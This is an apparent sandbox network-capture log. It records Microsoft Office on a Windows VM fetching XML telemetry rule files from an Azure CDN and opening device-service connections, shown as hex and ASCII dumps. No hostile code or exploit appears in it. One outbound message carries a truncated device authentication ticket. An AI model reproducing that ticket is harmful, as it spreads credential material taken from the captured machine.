                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093751Z-r1d97b99577xdmfxhC1TEBqbhg00000001v000000000634s
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        89192.168.2.64980213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:51 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                        x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093751Z-1777c6cb754lvj6mhC1TEBke940000000ax000000000cmf6
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:52 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        90192.168.2.64980313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:52 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:52 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                        x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093752Z-178bfbc474bbbqrhhC1NYCvw7400000001e0000000007pxz
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        91192.168.2.64980413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:53 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                        x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093753Z-1777c6cb7544nvmshC1TEBf7qc0000000ar00000000084bm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:53 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        92192.168.2.64980613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:53 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                        x-ms-request-id: bc14c112-c01e-00ad-2dca-3ba2b9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093753Z-r1d97b9957744xz5hC1TEB5bf80000000a30000000004f6x
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:53 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        93192.168.2.64980513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:54 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:54 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                        x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093754Z-178bfbc474bgvl54hC1NYCsfuw00000001a0000000004pr3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:54 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        94192.168.2.64980713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:54 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:54 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                        x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093754Z-178bfbc474bgvl54hC1NYCsfuw000000018g000000007mzp
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:54 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        95192.168.2.64980813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:55 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                        x-ms-request-id: e7fd51b1-801e-0067-1163-3bfe30000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093755Z-178bfbc474b9fdhphC1NYCac0n000000014g00000000b7s9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:55 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        96192.168.2.64980940.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 58 56 4f 42 69 43 57 36 45 6d 65 4b 41 46 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 35 39 66 37 64 37 35 66 66 35 62 34 32 64 65 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: qXVOBiCW6EmeKAFR.1Context: f59f7d75ff5b42de
                                                                                                                                                                        2024-11-21 09:37:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:55 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 71 58 56 4f 42 69 43 57 36 45 6d 65 4b 41 46 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 35 39 66 37 64 37 35 66 66 35 62 34 32 64 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6f 4a 67 77 33 78 62 6a 73 61 31 2b 45 45 5a 34 43 58 6d 57 77 51 41 64 6a 45 56 34 6b 49 75 52 78 36 36 73 4d 52 6e 39 74 6d 58 46 31 73 70 4d 7a 31 33 6d 59 43 63 55 68 6e 57 5a 6f 41 5a 30 37 58 31 39 6f 75 44 71 2f 6d 71 63 38 69 4b 61 55 4d 31 67 55 34 7a 35 70 71 47 76 54 39 50 37 58 4d 58 43 53 4e 74 75 70 6d 72 53
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: qXVOBiCW6EmeKAFR.2Context: f59f7d75ff5b42de<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXoJgw3xbjsa1+EEZ4CXmWwQAdjEV4kIuRx66sMRn9tmXF1spMz13mYCcUhnWZoAZ07X19ouDq/mqc8iKaUM1gU4z5pqGvT9P7XMXCSNtupmrS
                                                                                                                                                                        2024-11-21 09:37:55 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 71 58 56 4f 42 69 43 57 36 45 6d 65 4b 41 46 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 35 39 66 37 64 37 35 66 66 35 62 34 32 64 65 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: qXVOBiCW6EmeKAFR.3Context: f59f7d75ff5b42de
                                                                                                                                                                        2024-11-21 09:37:55 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:55 UTC58INData Raw: 4d 53 2d 43 56 3a 20 7a 77 52 48 57 76 32 6f 69 55 57 34 66 78 44 68 49 4d 74 34 33 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: zwRHWv2oiUW4fxDhIMt43w.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        97192.168.2.64981040.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 65 32 71 75 43 65 58 61 55 36 72 63 4e 66 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 66 39 38 30 39 65 63 66 35 37 62 66 38 37 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 5e2quCeXaU6rcNf3.1Context: 46f9809ecf57bf87
                                                                                                                                                                        2024-11-21 09:37:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
